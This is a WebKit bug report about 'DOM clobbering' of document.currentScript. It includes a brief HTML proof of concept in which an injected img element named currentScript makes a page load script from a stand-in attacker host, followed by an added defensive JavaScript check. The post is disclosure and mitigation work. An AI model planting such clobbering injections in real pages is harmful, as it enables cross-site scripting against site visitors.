[Webkit-unassigned] [Bug 281129] New: Prevent document.currentScript from being overwritten via a DOM element with name='currentScript'
bugzilla-daemon at webkit.org
Wed Oct 9 02:44:13 PDT 2024
https://bugs.webkit.org/show_bug.cgi?id=281129
Bug ID: 281129
Summary: Prevent document.currentScript from being overwritten via a DOM element with name='currentScript'
Product: WebKit
Version: Other
Hardware: All
OS: All
Status: NEW
Severity: Enhancement
Priority: P2
Component: DOM
Assignee: webkit-unassigned at lists.webkit.org
Reporter: jujjyl at gmail.com
There is a relatively common source of CVEs being reported, e.g.
- https://vulert.com/vuln-db/CVE-2024-45389
- https://github.com/advisories/GHSA-gcx4-mw62-g8wm
- https://nvd.nist.gov/vuln/detail/CVE-2024-45812
- https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986
based on a "DOM clobbering" technique: if an attacker can inject a DOM element with a `name='currentScript'` attribute, and the page happens to read `document.currentScript.src` to decide which URL to load a sibling JS file from, then the attacker can escalate from DOM clobbering to an XSS attack.
I.e.
```html
<html><body>
<!-- Injected by the attacker: a named element that clobbers document.currentScript -->
<img name='currentScript' src='http://bad.attacker.site.com/foo.js'>
<script>
var script = document.createElement('script');
// document.currentScript now resolves to the <img> above, so its .src is attacker-controlled
var scriptDir = document.currentScript.src.substr(0, document.currentScript.src.lastIndexOf('/'));
script.src = `${scriptDir}/sibling.js`;
document.body.appendChild(script); // fetches sibling.js from the attacker's host
</script></body></html>
```
will undesirably load `http://bad.attacker.site.com/sibling.js` instead of `/sibling.js` from the same server that the HTML site is served at.
This is discussed in the WhatWG/HTML ticket at https://github.com/whatwg/html/issues/10687, where browsers are asked to blacklist the special `name="currentScript"` attribute from clobbering `document.currentScript`. A WPT test is added at https://github.com/web-platform-tests/wpt/pull/48536.
Would Apple agree to enforce this security restriction and +1 the proposal at https://github.com/whatwg/html/issues/10687 ?
(This is a security problem, but it is not being marked hidden since there are already so many public CVEs that have been reported and the issue has been known since at least 2016.)
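Until browsers enforce the restriction, a page can defend itself by refusing to trust a `document.currentScript` that is not a genuine `<script>` element. The following is an added example, not code from the bug report or from WebKit; the document is passed in as a parameter and the DOM objects at the bottom are constructed stand-ins so the logic can be exercised outside a browser.

```javascript
// Hardened sibling-script resolution that ignores a clobbered document.currentScript.
// Named-property clobbering can only surface <img>, <form>, <embed>, <object> or
// <iframe> elements, never a real <script>, so a type check separates the two.
const XHTML_NS = 'http://www.w3.org/1999/xhtml';

// True only for a genuine HTML <script> element.
function isRealScriptElement(el) {
  if (!el || typeof el !== 'object') return false;
  if (typeof HTMLScriptElement !== 'undefined') return el instanceof HTMLScriptElement;
  // Non-browser fallback (used by the constructed stand-ins below): tag and namespace.
  return el.tagName === 'SCRIPT' && el.namespaceURI === XHTML_NS;
}

// Detection signal: a non-null currentScript that is not a <script> can only come
// from clobbering, so this is worth logging/reporting as an injection indicator.
function isCurrentScriptClobbered(doc) {
  const cs = doc.currentScript;
  return cs !== null && cs !== undefined && !isRealScriptElement(cs);
}

// Directory of the running external classic script, or null when currentScript is
// absent (module/async code), inline (empty src) or clobbered.
function trustedScriptDir(doc) {
  const cs = doc.currentScript;
  if (!isRealScriptElement(cs) || typeof cs.src !== 'string' || cs.src === '') return null;
  return cs.src.slice(0, cs.src.lastIndexOf('/') + 1);
}

// Resolve the sibling URL; when currentScript cannot be trusted, fall back to the
// document's own base URL rather than whatever host an injected element names.
function siblingScriptUrl(doc, fileName) {
  const dir = trustedScriptDir(doc);
  if (dir !== null) return { fromCurrentScript: true, url: dir + fileName };
  return { fromCurrentScript: false, url: new URL(fileName, doc.baseURI).href };
}

// Constructed stand-ins (not real DOM objects) showing both outcomes.
const legitScript = { tagName: 'SCRIPT', namespaceURI: XHTML_NS, src: 'https://example.test/js/app.js' };
const clobberImg = { tagName: 'IMG', namespaceURI: XHTML_NS, name: 'currentScript',
                     src: 'http://bad.attacker.site.com/foo.js' };
const normalDoc = { currentScript: legitScript, baseURI: 'https://example.test/index.html' };
const clobberedDoc = { currentScript: clobberImg, baseURI: 'https://example.test/index.html' };

console.log(siblingScriptUrl(normalDoc, 'sibling.js'));    // https://example.test/js/sibling.js
console.log(siblingScriptUrl(clobberedDoc, 'sibling.js')); // https://example.test/sibling.js
console.log(isCurrentScriptClobbered(clobberedDoc));       // true
```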